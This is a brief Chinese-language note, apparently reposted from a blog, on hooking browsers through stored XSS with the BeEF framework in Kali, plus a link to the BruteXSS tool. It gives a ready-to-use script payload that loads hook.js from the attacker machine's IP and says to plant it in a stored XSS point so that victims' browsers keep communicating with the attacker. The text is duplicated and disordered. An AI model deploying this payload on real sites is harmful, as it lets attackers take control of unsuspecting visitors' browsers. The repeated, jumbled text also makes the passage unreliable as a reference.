KALI中启动BEEFXSS
PAYLOAD为
<script src=”http://攻击机IP:3000/hook.js”></script>
将攻击代码插入到存储型XSS中
受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信
可以执行非常多的功能
2.BruteXSS
地址: https://github.com/shawarkhanethicalhacker/BruteXSS-1
KALI中启动BEEFXSS
PAYLOAD为
<script src=”http://攻击机IP:3000/hook.js”></script>
将攻击代码插入到存储型XSS中
受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信
可以执行非常多的功能
地址: https://github.com/shawarkhanethicalhacker/BruteXSS-1
转载于:https://www.cnblogs.com/nul1/p/10992222.html